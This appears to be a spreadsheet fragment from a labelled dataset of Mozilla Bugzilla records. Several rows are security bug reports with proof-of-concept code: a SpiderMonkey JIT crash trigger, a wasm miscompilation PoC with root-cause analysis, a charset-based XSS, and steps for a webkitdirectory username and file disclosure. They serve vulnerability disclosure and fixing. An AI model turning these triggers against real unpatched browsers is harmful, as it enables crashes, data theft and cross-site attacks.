Shadow bytes around the buggy address:
  0x0c0c8012efd0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8012efe0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c8012eff0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c8012f000: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8012f010: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=&gt;0x0c0c8012f020:[fd]fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x0c0c8012f030: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c8012f040: fa fa fa fa 00 00 00 00 00 00 05 fa fa fa fa fa
  0x0c0c8012f050: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00
  0x0c0c8012f060: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8012f070: fa fa fa fa fd fd fd fd fd fd fd fd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18678==ABORTING</t>
        </is>
      </c>
      <c r="X2896" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2897">
      <c r="A2897" t="n">
        <v>1885828</v>
      </c>
      <c r="B2897" t="inlineStr">
        <is>
          <t>2024-03-17 23:45:46 -0700</t>
        </is>
      </c>
      <c r="C2897" t="inlineStr">
        <is>
          <t>Wild pointer-deref from jitted code</t>
        </is>
      </c>
      <c r="D2897" t="inlineStr">
        <is>
          <t>2024-09-18 19:37:02 -0700</t>
        </is>
      </c>
      <c r="E2897" t="n">
        <v>1</v>
      </c>
      <c r="F2897" t="n">
        <v>1</v>
      </c>
      <c r="G2897" t="n">
        <v>3</v>
      </c>
      <c r="H2897" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2897" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2897" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2897" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2897" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2897" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2897" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2897" t="inlineStr">
        <is>
          <t>[adv-main125+]</t>
        </is>
      </c>
      <c r="Q2897" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2897" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2897" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T2897" t="n">
        <v>1</v>
      </c>
      <c r="U2897" t="n">
        <v>0</v>
      </c>
      <c r="V2897" t="n">
        <v>17</v>
      </c>
      <c r="W2897" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 6d5114b3ba4e5c3414a19419ca1d0170ca149b13 the attached sample crashes the js-shell when invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fast-warmup --fuzzing-safe crash.js`. The crash is caused by a wild pointer deref from jitted code; e.g. when attempting to access `0x9cc00d6602f`.
I'm running a bisect now and will provide an update regarding the regression range.
```
function f9(a10) {
    for (let i13 = 1000; i13-- &gt; 0;) {
        (`(f32.neg`).slice(a10).search(undefined);
    }   
}
f9(1);
f9(-1);
```
```
(gdb) x/i $rip
=&gt; 0x2e17391d924d:	movzx  r10d,WORD PTR [r12]
(gdb) i r r12
r12            0x9cc00d6602f       10771792027695
(gdb) x/x 0x9cc00d6602f
0x9cc00d6602f:	Cannot access memory at address 0x9cc00d6602f
#0  0x00002e17391d924d in ?? ()
#1  0x0000000000000001 in ?? ()
#2  0x000009cb00d63040 in ?? ()
#3  0x00007fffffffc630 in ?? ()
#4  0x00007ffff4f7d600 in ?? ()
#5  0x00007fff00000000 in ?? ()
#6  0x00005555590de150 in ?? ()
#7  0xfff8000100000072 in ?? ()
#8  0x00005555590de210 in JSFunctionClassSpec ()
#9  0x00000001ffffc170 in ?? ()
#10 0x000055555814ea13 in js::BaseScript::sourceStart (this=&lt;optimized out&gt;)
    at js/src/jit/JitHints-inl.h:21
#11 js::jit::JitHintsMap::getScriptKey (this=&lt;optimized out&gt;, script=0xffffffff)
    at js/src/jit/JitHints-inl.h:22
#12 0x00002e17391577a5 in ?? ()
#13 0x0000000000000025 in ?? ()
#14 0x00001048bc800650 in ?? ()
#15 0xfff9800000000000 in ?? ()
#16 0xfff88000ffffffff in ?? ()
#17 0xfff9800000000000 in ?? ()
#18 0xfff9800000000000 in ?? ()
#19 0x00007fffffffc220 in ?? ()
#20 0x00002e1739157d81 in ?? ()
#21 0x0000000000000023 in ?? ()
#22 0x00001048bc800650 in ?? ()
#23 0xfff9800000000000 in ?? ()
#24 0xfff88000ffffffff in ?? ()
#25 0x00007fffffffc290 in ?? ()
#26 0x00002e1739157720 in ?? ()
#27 0x00007ffff6039100 in ?? ()
#28 0x00002e1739157c10 in ?? ()
#29 0x0000000000000002 in ?? ()
#30 0x00007fffffffc630 in ?? ()
#31 0x00007fffffffc580 in ?? ()
#32 0x0000555558803ae6 in EnterJit (cx=0x7fffffffc190, state=..., 
    code=0xfff9800000000000 &lt;error: Cannot access memory at address 0xfff9800000000000&gt;)
    at js/src/jit/Jit.cpp:115
#33 js::jit::MaybeEnterJit (cx=0x7fffffffc190, state=...) at js/src/jit/Jit.cpp:261
```</t>
        </is>
      </c>
      <c r="X2897" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2898">
      <c r="A2898" t="n">
        <v>999651</v>
      </c>
      <c r="B2898" t="inlineStr">
        <is>
          <t>2014-04-22 13:15:29 -0700</t>
        </is>
      </c>
      <c r="C2898" t="inlineStr">
        <is>
          <t>Invalidation due to ArrayBuffer neutering doesn't work when the ArrayBuffer's data pointer doesn't change</t>
        </is>
      </c>
      <c r="D2898" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:26 -0700</t>
        </is>
      </c>
      <c r="E2898" t="n">
        <v>1</v>
      </c>
      <c r="F2898" t="n">
        <v>1</v>
      </c>
      <c r="G2898" t="n">
        <v>3</v>
      </c>
      <c r="H2898" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2898" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2898" t="inlineStr">
        <is>
          <t>JavaScript: Standard Library</t>
        </is>
      </c>
      <c r="K2898" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2898" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2898" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2898" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2898" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+][qa-]</t>
        </is>
      </c>
      <c r="Q2898" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2898" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2898" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2898" t="n">
        <v>1</v>
      </c>
      <c r="U2898" t="n">
        <v>0</v>
      </c>
      <c r="V2898" t="n">
        <v>35</v>
      </c>
      <c r="W2898" t="inlineStr">
        <is>
          <t>The constraint that handles ArrayBuffer neutering invalidations is so:
// Constraint which triggers recompilation when the underlying data pointer for
// a typed array changes.
class ConstraintDataFreezeObjectForTypedArrayBuffer
{
    void *viewData;
  public:
    ConstraintDataFreezeObjectForTypedArrayBuffer(void *viewData)
      : viewData(viewData)
    {}
    bool invalidateOnNewObjectState(TypeObject *object) {
        return object-&gt;singleton()-&gt;as&lt;TypedArrayObject&gt;().viewData() != viewData;
    }
    // ...
};
It assumes that the only reason invalidation needs to happen, is when the typed array's data pointer changes.  But that's not really complete.  There are cases where the data pointer *doesn't* change when the underlying ArrayBuffer is neutered.  asm.js ArrayBuffers in certain cases (although this is sort of only a temporary restriction, the fix for which just hasn't been implemented yet, I hear) are one instance.  The current behavior of the neuter() shell builtin is another.
Guarding on the data pointer changing is necessary, but not enough.  We also need to guard on the ArrayBuffer's byte length not changing.  Or, perhaps, we need different *sorts* of guards for different situations.  For example, when inlining the length of a typed array, we don't care about the data pointer remaining the same, only about the length remaining the same.  So perhaps we need two different constraints here, one watching just length, one watching length and data pointer both.  Or maybe, depending on use, only the data pointer one is needed, but care has to be taken how that data pointer (once inlined) is subsequently used.  Hmm.
I'm not sure about the security implications of this yet.  It depends on exactly what the ultimate dependency is, that the constraint's guarding against.</t>
        </is>
      </c>
      <c r="X2898" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2899">
      <c r="A2899" t="n">
        <v>1607204</v>
      </c>
      <c r="B2899" t="inlineStr">
        <is>
          <t>2020-01-06 05:59:19 -0800</t>
        </is>
      </c>
      <c r="C2899" t="inlineStr">
        <is>
          <t>Invalid command line in compile_commands.json</t>
        </is>
      </c>
      <c r="D2899" t="inlineStr">
        <is>
          <t>2020-01-25 01:51:11 -0800</t>
        </is>
      </c>
      <c r="E2899" t="n">
        <v>1</v>
      </c>
      <c r="F2899" t="n">
        <v>1</v>
      </c>
      <c r="G2899" t="n">
        <v>7</v>
      </c>
      <c r="H2899" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2899" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2899" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2899" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2899" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2899" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2899" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2899" t="inlineStr"/>
      <c r="Q2899" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2899" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2899" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T2899" t="n">
        <v>1</v>
      </c>
      <c r="U2899" t="n">
        <v>0</v>
      </c>
      <c r="V2899" t="n">
        <v>14</v>
      </c>
      <c r="W2899" t="inlineStr">
        <is>
          <t>In compile_commands.json, I get:
```
{
"directory": "/home/calixte/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu/netwerk/srtp/src", 
"command": "... '-DPACKAGE_STRING=\"libsrtp2' '2.2.0-pre\"' '-DPACKAGE_VERSION=\"2.2.0-pre\"' ...", 
"file": "/home/calixte/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu/netwerk/srtp/src/Unified_c_netwerk_srtp_src0.c"
}
```
I think this is incorrect and it should be `'-DPACKAGE_STRING=\"libsrtp2 2.2.0-pre\"'`.
This option is defined here:
https://searchfox.org/mozilla-central/source/netwerk/srtp/src/moz.build#40
And for any reason, the argument is splitted around space.</t>
        </is>
      </c>
      <c r="X2899" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2900">
      <c r="A2900" t="n">
        <v>801681</v>
      </c>
      <c r="B2900" t="inlineStr">
        <is>
          <t>2012-10-15 08:38:46 -0700</t>
        </is>
      </c>
      <c r="C2900" t="inlineStr">
        <is>
          <t>"~" eats a char near chunk delimiter in HZ-GB-2312 encoding</t>
        </is>
      </c>
      <c r="D2900" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:59 -0700</t>
        </is>
      </c>
      <c r="E2900" t="n">
        <v>1</v>
      </c>
      <c r="F2900" t="n">
        <v>1</v>
      </c>
      <c r="G2900" t="n">
        <v>3</v>
      </c>
      <c r="H2900" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2900" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2900" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2900" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2900" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2900" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2900" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2900" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+] XSS against sites using this charset</t>
        </is>
      </c>
      <c r="Q2900" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2900" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2900" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2900" t="n">
        <v>1</v>
      </c>
      <c r="U2900" t="n">
        <v>0</v>
      </c>
      <c r="V2900" t="n">
        <v>15</v>
      </c>
      <c r="W2900" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121010144125
Steps to reproduce:
In HZ-GB-2312 encoding, "~" eats a char near chunk delimiter. This behavior is Firefox only. 
This leads to XSS attack:
http://vulnerabledoma.in/fx_hz?q=~%20123
Also, this has potential risk of Bug 690225.
Expected results:
"~" should not eat character.</t>
        </is>
      </c>
      <c r="X2900" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2901">
      <c r="A2901" t="n">
        <v>1319370</v>
      </c>
      <c r="B2901" t="inlineStr">
        <is>
          <t>2016-11-22 01:53:36 -0800</t>
        </is>
      </c>
      <c r="C2901" t="inlineStr">
        <is>
          <t>webkitdirectory - OS username disclosure</t>
        </is>
      </c>
      <c r="D2901" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:25 -0700</t>
        </is>
      </c>
      <c r="E2901" t="n">
        <v>1</v>
      </c>
      <c r="F2901" t="n">
        <v>1</v>
      </c>
      <c r="G2901" t="n">
        <v>3</v>
      </c>
      <c r="H2901" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2901" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2901" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2901" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2901" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2901" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][fingerprinting][adv-main52+]</t>
        </is>
      </c>
      <c r="Q2901" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2901" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2901" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2901" t="n">
        <v>1</v>
      </c>
      <c r="U2901" t="n">
        <v>0</v>
      </c>
      <c r="V2901" t="n">
        <v>23</v>
      </c>
      <c r="W2901" t="inlineStr">
        <is>
          <t>Created attachment 8813100
filedis.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
Tested on latest Nightly 53.0a1 (2016-11-21) (64-bit)
-----------OS username disclosure--------
The webkitdirectory on fresh install and profile (or new website where directory has never been uploaded) seems to always default to 'C:\Users\{user}\Desktop'
1. Open PoC on a fresh URL where directory uploading has never been performed (to make sure it defaults to dekstop)
2. Hold down enter 
3. Since webkitdirectory keeps going back a folder every time its used, we only need to make sure a victim keeps hitting enter for at least 2-3 upload dialogues and then we would have successfully grabbed the OS username.
------------Arbitrary File Disclosure--------
Say you go to website 'A' and you upload a directory (doesn't actually have to upload, just as long as you loaded files) that exists in the folder 'C:\Users\{user}\Documents\', if we are able to run the attached PoC on website 'A' (say XSS or if website 'A' is codepen/jsfiddle..etc) we will be able to fool the user into uploading the entire contents of the 'My Documents' folder.
Here is one scenario:
1. Victim visits a codepen link that showcases html5 webkitdirectory.
2. Victim tests this new feature by uploading/selecting a random folder within 'My documents' then forgets about it.
3. Victim receives an attackers website which embeds a codepen code that uses the PoC here.
4. Victim then knowingly exposes his/her files.
As I mentioned, this can also be done with XSS vulnerabilities or possibly even URL spoofing.
Actual results:
In both scenarios we either disclose OS username or we have access to arbitrary files on victims computer.
Expected results:
Two suggestions:
1. Prevent input.click() from bypassing popup blocker, only allow it from mouse clicks.
2. Prevent the behavior where within the Documents folder and its contents (sub folders as well) be uploaded without explicitly choosing such an action. 
For some reason #2 so far only works on Documents folder, the folder uploader seems to ignore this behavior when on C: or desktop folder and others. But if it worked for My Documents my guess is it would work on other locations.</t>
        </is>
      </c>
      <c r="X2901" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2902">
      <c r="A2902" t="n">
        <v>1822754</v>
      </c>
      <c r="B2902" t="inlineStr">
        <is>
          <t>2023-03-16 01:26:41 -0700</t>
        </is>
      </c>
      <c r="C2902" t="inlineStr">
        <is>
          <t>Wrong lowering of UDiv MIR in ARM64 Ion compiler</t>
        </is>
      </c>
      <c r="D2902" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:11 -0700</t>
        </is>
      </c>
      <c r="E2902" t="n">
        <v>1</v>
      </c>
      <c r="F2902" t="n">
        <v>1</v>
      </c>
      <c r="G2902" t="n">
        <v>3</v>
      </c>
      <c r="H2902" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2902" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2902" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2902" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2902" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2902" t="inlineStr">
        <is>
          <t>[adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q2902" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2902" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2902" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T2902" t="n">
        <v>1</v>
      </c>
      <c r="U2902" t="n">
        <v>0</v>
      </c>
      <c r="V2902" t="n">
        <v>20</v>
      </c>
      <c r="W2902" t="inlineStr">
        <is>
          <t>## Overview
Target: SpiderMonkey ARM64 latest of 2023/3/15 - commit `5860c73273ab6a71408c8b595db695c149155dff`
Wrong lowering of UDiv MIR in ARM64 Ion compiler results in wrong optimization result.
## Proof of Concept Code
```wat
(module
  (type (;0;) (func (param i32) (result i32)))
  (import "mem" "mem" (memory (;0;) 1024))
  (func (;0;) (type 0) (param i32) (result i32)
    local.get 0
    i32.const -1 ;; any value of -2^n will work
    i32.div_u)
  (export "main" (func 0)))
```
```js
// [('i32.div_u', 'i32', ('i32.const',))]
// const code = new Uint8Array([...]);
const code = new Uint8Array([0,97,115,109,1,0,0,0,1,6,1,96,1,127,1,127,2,13,1,3,109,101,109,3,109,101,109,2,0,128,8,3,2,1,0,7,8,1,4,109,97,105,110,0,0,10,9,1,7,0,32,0,65,127,110,11,11,1,0]);
let memory = new WebAssembly.Memory({
    initial: 1024
})
const module = new WebAssembly.Module(code);
const instance = new WebAssembly.Instance(module, {
    mem: {
        mem: memory
    }
});
// print(instance.exports.main(0, 1, 2))
print(instance.exports.main(-2)); // any value would work
```
```
$ builds/arm64_debug/dist/bin/js --wasm-compiler=baseline poc.js
0
$ builds/arm64_debug/dist/bin/js --wasm-compiler=ion poc.js
-2
```
## Root Cause Analysis
When lowering `UDiv`, shift value is calculated with the absolute value of the divisor. When the divisor is the negation of an integer which is power of two, `LDivPowTwoI` LIR will be generated with `shift=0`, resulting in an identity (`x -&gt; x`) or right shift operation, which is wrong.
```c++
// src/jit/arm64/Lowering-arm64.cpp:574
void LIRGeneratorARM64::lowerUDiv(MDiv* div) {
  LAllocation lhs = useRegister(div-&gt;lhs());
  if (div-&gt;rhs()-&gt;isConstant()) {
    int32_t rhs = div-&gt;rhs()-&gt;toConstant()-&gt;toInt32();
    int32_t shift = mozilla::FloorLog2(mozilla::Abs(rhs)); // [*] Bug
    if (rhs != 0 &amp;&amp; uint32_t(1) &lt;&lt; shift == mozilla::Abs(rhs)) { // [1] rhs=0xffffffff, shift=0, abs=1
      LDivPowTwoI* lir = new (alloc()) LDivPowTwoI(lhs, shift, false); // [2] shift=0, negativeDivisor=false 
      if (div-&gt;fallible()) {
        assignSnapshot(lir, div-&gt;bailoutKind());
      }
      define(lir, div);
      return;
    }
    (...)
  }
  (...)
}
```
We are handling the case where `rhs` is constant. Therefore, `rhs` is considered as a signed integer, and shift value is calculated with absolute value of `rhs`. ([*] Bug part) To explain more in detail, the compiler enters the condition [1] when `rhs` is `-2^n`, and in [2], `LDivPowTwoI` LIR will be generated. The LIR will be later handled with an identity or a right shift operation in the code generation. (See `src/jit/arm64/CodeGenerator-arm64.cpp:515` for more detail)
If we think of an example where `rhs=-1`, `abs(rhs)=1`, so `shift=0`. `shift=0` will be later handled as an identity operation in the code generation.
The expected behavior is to consider `rhs` as an **unsigned** value. Then, the code will work as intended.
You can refer to the following result codes below:
- arm64 baseline
```
0xbe069c8b000  d10043ff  sub     sp, sp, #0x10 (16)
0xbe069c8b004  f90007fe  str     x30, [sp, #8]
0xbe069c8b008  f90003fd  str     x29, [sp]
0xbe069c8b00c  910003fd  mov     x29, sp
0xbe069c8b010  71008d5f  cmp     w10, #0x23 (35)
0xbe069c8b014  540000e0  b.eq    #+0x1c (addr 0xbe069c8b030)
0xbe069c8b018  d4a00000  unimplemented (Exception)
0xbe069c8b01c  d503201f  nop
0xbe069c8b020  d10043ff  sub     sp, sp, #0x10 (16)
0xbe069c8b024  f90007fe  str     x30, [sp, #8]
0xbe069c8b028  f90003fd  str     x29, [sp]
0xbe069c8b02c  910003fd  mov     x29, sp
0xbe069c8b030  910003fc  mov     x28, sp
0xbe069c8b034  d2800a10  mov     x16, #0x50
0xbe069c8b038  f2a00010  movk    x16, #0x0, lsl #16
0xbe069c8b03c  cb3063e8  sub     x8, sp, x16
0xbe069c8b040  f9401ef0  ldr     x16, [x23, #56]
0xbe069c8b044  eb08021f  cmp     x16, x8
0xbe069c8b048  54000043  b.lo    #+0x8 (addr 0xbe069c8b050)
0xbe069c8b04c  d4a00000  unimplemented (Exception)
0xbe069c8b050  d10143ff  sub     sp, sp, #0x50 (80)
0xbe069c8b054  b9004fe0  str     w0, [sp, #76]
0xbe069c8b058  f90023f7  str     x23, [sp, #64]
0xbe069c8b05c  12800000  mov     w0, #0xffffffff
0xbe069c8b060  b9404fe1  ldr     w1, [sp, #76]
0xbe069c8b064  1ac00821  udiv    w1, w1, w0
0xbe069c8b068  2a0103e0  mov     w0, w1
0xbe069c8b06c  14000002  b       #+0x8 (addr 0xbe069c8b074)
0xbe069c8b070  d4200000  brk     #0x0
0xbe069c8b074  910143ff  add     sp, sp, #0x50 (80)
0xbe069c8b078  f94003fd  ldr     x29, [sp]
0xbe069c8b07c  f94007fe  ldr     x30, [sp, #8]
0xbe069c8b080  910043ff  add     sp, sp, #0x10 (16)
0xbe069c8b084  910003fc  mov     x28, sp
0xbe069c8b088  d65f03c0  ret
```
- arm64 ion
```
0x2ed13ecb6000  d10043ff  sub     sp, sp, #0x10 (16)
0x2ed13ecb6004  f90007fe  str     x30, [sp, #8]
0x2ed13ecb6008  f90003fd  str     x29, [sp]
0x2ed13ecb600c  910003fd  mov     x29, sp
0x2ed13ecb6010  71008d5f  cmp     w10, #0x23 (35)
0x2ed13ecb6014  540000e0  b.eq    #+0x1c (addr 0x2ed13ecb6030)
0x2ed13ecb6018  d4a00000  unimplemented (Exception)
0x2ed13ecb601c  d503201f  nop
0x2ed13ecb6020  d10043ff  sub     sp, sp, #0x10 (16)
0x2ed13ecb6024  f90007fe  str     x30, [sp, #8]
0x2ed13ecb6028  f90003fd  str     x29, [sp]
0x2ed13ecb602c  910003fd  mov     x29, sp
0x2ed13ecb6030  910003fc  mov     x28, sp
0x2ed13ecb6034  2a0003e2  mov     w2, w0
0x2ed13ecb6038  2a0203e1  mov     w1, w2
0x2ed13ecb603c  2a0103e0  mov     w0, w1 ;; [!] Bug here: function returns as arg1
0x2ed13ecb6040  f94003fd  ldr     x29, [sp]
0x2ed13ecb6044  f94007fe  ldr     x30, [sp, #8]
0x2ed13ecb6048  910043ff  add     sp, sp, #0x10 (16)
0x2ed13ecb604c  910003fc  mov     x28, sp
0x2ed13ecb6050  d65f03c0  ret
```
## Suggested Patch
`rhs` must be considered as an **unsigned** value when lowering UDiv MIR to LIR. The following two lines of code would be fixed.
```diff
// src/jit/arm64/Lowering-arm64.cpp:574
void LIRGeneratorARM64::lowerUDiv(MDiv* div) {
  LAllocation lhs = useRegister(div-&gt;lhs());
  if (div-&gt;rhs()-&gt;isConstant()) {
-    int32_t rhs = div-&gt;rhs()-&gt;toConstant()-&gt;toInt32();
-    int32_t shift = mozilla::FloorLog2(mozilla::Abs(rhs));
+    uint32_t rhs = div-&gt;rhs()-&gt;toConstant()-&gt;toUint32();
+    int32_t shift = mozilla::FloorLog2(rhs);
    if (rhs != 0 &amp;&amp; uint32_t(1) &lt;&lt; shift == mozilla::Abs(rhs)) {
      LDivPowTwoI* lir = new (alloc()) LDivPowTwoI(lhs, shift, false);
      if (div-&gt;fallible()) {
        assignSnapshot(lir, div-&gt;bailoutKind());
      }
      define(lir, div);
      return;
    }
    (...)
  }
  (...)
}
```</t>
        </is>
      </c>
      <c r="X2902" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2903">
      <c r="A2903" t="n">
        <v>731299</v>
      </c>
      <c r="B2903" t="inlineStr">
        <is>
          <t>2012-02-28 10:25:01 -0800</t>
        </is>
      </c>
      <c r="C2903" t="inlineStr">
        <is>
          <t>Create bouncer links for Aurora downloads</t>
        </is>
      </c>
      <c r="D2903" t="inlineStr">
        <is>
          <t>2013-12-19 05:24:06 -0800</t>
        </is>
      </c>
      <c r="E2903" t="n">
        <v>1</v>
      </c>
      <c r="F2903" t="n">
        <v>1</v>
      </c>
      <c r="G2903" t="n">
        <v>4</v>
      </c>
      <c r="H2903" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2903" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J2903" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K2903" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2903" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2903" t="inlineStr">
        <is>
          <t>[x-functional][bouncer] [bouncer-improvement][qa+]</t>
        </is>
      </c>
      <c r="Q2903" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2903" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2903" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2903" t="n">
        <v>1</v>
      </c>
      <c r="U2903" t="n">
        <v>0</v>
      </c>
      <c r="V2903" t="n">
        <v>41</v>
      </c>
      <c r="W2903" t="inlineStr">
        <is>
          <t>We want to track Aurora version downloads separately and have distinct bouncer entries for them for use on the website. An example (thanks Rail) would be http://download.mozilla.org/?product=firefox-aurora-13.0&amp;os=win&amp;lang=af</t>
        </is>
      </c>
      <c r="X2903" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2904">
      <c r="A2904" t="n">
        <v>1206564</v>
      </c>
      <c r="B2904" t="inlineStr">
        <is>
          <t>2015-09-20 18:20:34 -0700</t>
        </is>
      </c>
      <c r="C2904" t="inlineStr">
        <is>
          <t>crash from spinning event loop during resize paint</t>
        </is>
      </c>
      <c r="D2904" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:06 -0700</t>
        </is>
      </c>
      <c r="E2904" t="n">
        <v>1</v>
      </c>
      <c r="F2904" t="n">
        <v>1</v>
      </c>
      <c r="G2904" t="n">
        <v>3</v>
      </c>
      <c r="H2904" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
